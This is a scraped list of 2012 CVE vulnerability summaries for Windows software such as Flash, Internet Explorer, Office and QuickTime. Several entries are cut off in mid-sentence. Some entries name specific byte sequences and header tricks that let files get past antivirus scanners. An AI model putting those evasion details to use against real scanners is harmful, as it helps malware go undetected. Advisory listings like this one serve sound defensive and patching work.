[CVE-2012-2376] Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012. [CVE-2012-2290] The client in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375 allows remote attackers to execute arbitrary code by sending a crafted message over a TCP communication channel. [CVE-2012-2287] The authentication functionality in EMC RSA Authentication Agent 7.1 and RSA Authentication Client 3.5 on Windows XP and Windows Server 2003, when an unspecified configuration exists, allows remote authenticated users to bypass an intended token-authentication step, and establish a login session to a remote host, by leveraging Windows credentials for that host. [CVE-2012-2284] The (1) install and (2) upgrade processes in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375, when Exchange Server is used, allow local users to read cleartext administrator credentials via unspecified vectors. [CVE-2012-2273] Comodo Internet Security before 5.10.228257.2253 on Windows 7 x64 allows local users to cause a denial of service (system crash) via a crafted 32-bit Portable Executable (PE) file with a kernel ImageBase value. [CVE-2012-2051] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-2050] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2049] Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2040] Untrusted search path vulnerability in the installer in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2039] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2038] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2037] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2036] Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2035] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2034] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2006] Unspecified vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to modify data or cause a denial of service via unknown vectors. [CVE-2012-2005] Cross-site scripting (XSS) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2004] Open redirect vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2003] Cross-site request forgery (CSRF) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2012-1943] Untrusted search path vulnerability in Updater.exe in the Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allows local users to gain privileges via a Trojan horse wsock32.dll file in an application directory. [CVE-2012-1942] The Mozilla Updater and Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allow local users to gain privileges by loading a DLL file in a privileged context. [CVE-2012-1925] Opera before 11.62 does not ensure that a dialog window is placed on top of content windows, which makes it easier for user-assisted remote attackers to trick users into downloading and executing arbitrary files via a download dialog located under other windows. [CVE-2012-1896] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider trust levels during construction of output data, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Code Access Security Info Disclosure Vulnerability." [CVE-2012-1895] The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Reflection Bypass Vulnerability." [CVE-2012-1894] Microsoft Office for Mac 2011 uses world-writable permissions for the "Applications/Microsoft Office 2011/" directory and certain other directories, which allows local users to gain privileges by placing a Trojan horse executable file in one of these directories, aka "Office for Mac Improper Folder Permissions Vulnerability." [CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability." [CVE-2012-1889] Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. [CVE-2012-1888] Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file, aka "Visio DXF File Format Buffer Overflow Vulnerability." [CVE-2012-1887] Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1, and Office 2008 and 2011 for Mac, allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel SST Invalid Length Use After Free Vulnerability." [CVE-2012-1886] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1885] Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1882] Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Scrolling Events Information Disclosure Vulnerability." [CVE-2012-1881] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnRowsInserted Event Remote Code Execution Vulnerability." [CVE-2012-1880] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "insertRow Remote Code Execution Vulnerability." [CVE-2012-1879] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access an undefined memory location, aka "insertAdjacentText Remote Code Execution Vulnerability." [CVE-2012-1878] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnBeforeDeactivate Event Remote Code Execution Vulnerability." [CVE-2012-1877] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Title Element Change Remote Code Execution Vulnerability." [CVE-2012-1876] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1875] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability." [CVE-2012-1874] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows user-assisted remote attackers to execute arbitrary code by accessing a deleted object, aka "Developer Toolbar Remote Code Execution Vulnerability." [CVE-2012-1873] Microsoft Internet Explorer 7 through 9 does not properly create and initialize string data, which allows remote attackers to obtain sensitive information from process memory via a crafted HTML document, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-1872] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka "EUC-JP Character Encoding Vulnerability." [CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability." [CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability." [CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability." [CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability." [CVE-2012-1858] The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka "HTML Sanitization Vulnerability." [CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability." [CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability." [CVE-2012-1855] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly handle function pointers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Memory Access Vulnerability." [CVE-2012-1854] Untrusted search path vulnerability in VBE6.dll in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1849] Untrusted search path vulnerability in Microsoft Lync 2010, 2010 Attendee, and 2010 Attendant allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .ocsmeet file, aka "Lync Insecure Library Loading Vulnerability." [CVE-2012-1847] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1821] The Network Threat Protection module in the Manager component in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.700x on Windows Server 2003 allows remote attackers to cause a denial of service (web-server outage, or daemon crash or hang) via a flood of packets that triggers automated blocking of network traffic. [CVE-2012-1747] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1746. [CVE-2012-1746] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1747. [CVE-2012-1662] CA ARCserve Backup r12.0 through SP2, r12.5 before SP2, r15 through SP1, and r16 before SP1 on Windows allows remote attackers to cause a denial of service (service shutdown) via a crafted network request. [CVE-2012-1620] slock 0.9 does not properly handle the XRaiseWindow event when the screen is locked, which might allow physically proximate attackers to obtain sensitive information by pressing a button, which reveals the desktop and active windows. [CVE-2012-1545] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1539] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreePos Use After Free Vulnerability." [CVE-2012-1538] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CFormElement Use After Free Vulnerability." [CVE-2012-1535] Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content, as exploited in the wild in August 2012 with SWF content in a Word document. [CVE-2012-1529] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "OnMove Use After Free Vulnerability." [CVE-2012-1526] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2012-1525] Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-1524] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Attribute Remove Remote Code Execution Vulnerability." [CVE-2012-1523] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Center Element Remote Code Execution Vulnerability." [CVE-2012-1522] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Cached Object Remote Code Execution Vulnerability." [CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1458] The Microsoft CHM file parser in ClamAV 0.96.4 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CHM parser implementations. [CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. [CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. [CVE-2012-1441] The Microsoft EXE file parser in eSafe 7.0.17.0 and Prevx 3.0 allows remote attackers to bypass malware detection via an EXE file with a modified value in any of several e_ fields. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1438] The Microsoft Office file parser in Comodo Antivirus 7425 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via an Office file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Office parser implementations. [CVE-2012-1437] The Microsoft Office file parser in Comodo Antivirus 7425 allows remote attackers to bypass malware detection via an Office file with a \50\4B\53\70\58 character sequence at a certain location. [CVE-2012-1436] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \2D\6C\68 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1435] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \50\4B\4C\49\54\45 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1434] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1433] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1432] The Microsoft EXE file parser in Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \57\69\6E\5A\69\70 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1420] The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \7fELF character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-0779] Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux [CVE-2012-0773] The NetStream class in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228 on Windows, Mac OS X, and Linux [CVE-2012-0772] An unspecified ActiveX control in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228, and AIR before 3.2.0.2070, on Windows does not properly perform URL security domain checking, which allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors. [CVE-2012-0769] Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0768] The Matrix3D component in Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0767] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0756] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0755] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0754] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0753] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0752] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0751] The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2012-0733] IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when Integrated Windows authentication is used, allows remote authenticated users to obtain administrative privileges by hijacking a session associated with the service account. [CVE-2012-0713] Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 on Linux, UNIX, and Windows allows remote authenticated users to read arbitrary XML files via unknown vectors. [CVE-2012-0669] Buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file with Sorenson encoding. [CVE-2012-0667] Integer signedness error in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTVR movie file. [CVE-2012-0666] Stack-based buffer overflow in the plugin in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTMovie object. [CVE-2012-0664] Heap-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted text track in a movie file. [CVE-2012-0663] Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TeXML file. [CVE-2012-0584] The Internationalized Domain Name (IDN) feature in Apple Safari before 5.1.4 on Windows does not properly restrict the characters in URLs, which allows remote attackers to spoof a domain name via unspecified homoglyphs. [CVE-2012-0519] Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.2.0.2, when running on Windows, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2012-0472] The cairo-dwrite implementation in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9, when certain Windows Vista and Windows 7 configurations are used, does not properly restrict font-rendering attempts, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. [CVE-2012-0454] Use-after-free vulnerability in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 on 32-bit Windows 7 platforms allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving use of the file-open dialog in a child window, related to the IUnknown_QueryService function in the Windows shlwapi.dll library. [CVE-2012-0447] Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize data for image/vnd.microsoft.icon images, which allows remote attackers to obtain potentially sensitive information by reading a PNG image that was created through conversion from an ICO image. [CVE-2012-0430] Unspecified vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote attackers to obtain an administrator cookie and bypass authorization checks via unknown vectors. [CVE-2012-0429] dhost in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote authenticated users to cause a denial of service (daemon crash) via crafted characters in an HTTP request. [CVE-2012-0418] Unspecified vulnerability in the client in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 on Windows allows user-assisted remote attackers to execute arbitrary code via a crafted file. [CVE-2012-0265] Stack-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted pathname for a file. [CVE-2012-0185] Heap-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 Gold and SP1, Excel Viewer, and Office Compatibility Pack SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers incorrect handling of memory during opening, aka "Excel MergeCells Record Heap Overflow Vulnerability." [CVE-2012-0184] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0183] Microsoft Word 2003 SP3 and 2007 SP2 and SP3, Office 2008 and 2011 for Mac, and Office Compatibility Pack SP2 and SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "RTF Mismatch Vulnerability." [CVE-2012-0182] Microsoft Word 2007 SP2 and SP3 does not properly handle memory during the parsing of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Word PAPX Section Corruption Vulnerability." [CVE-2012-0177] Heap-based buffer overflow in the Office Works File Converter in Microsoft Office 2007 SP2, 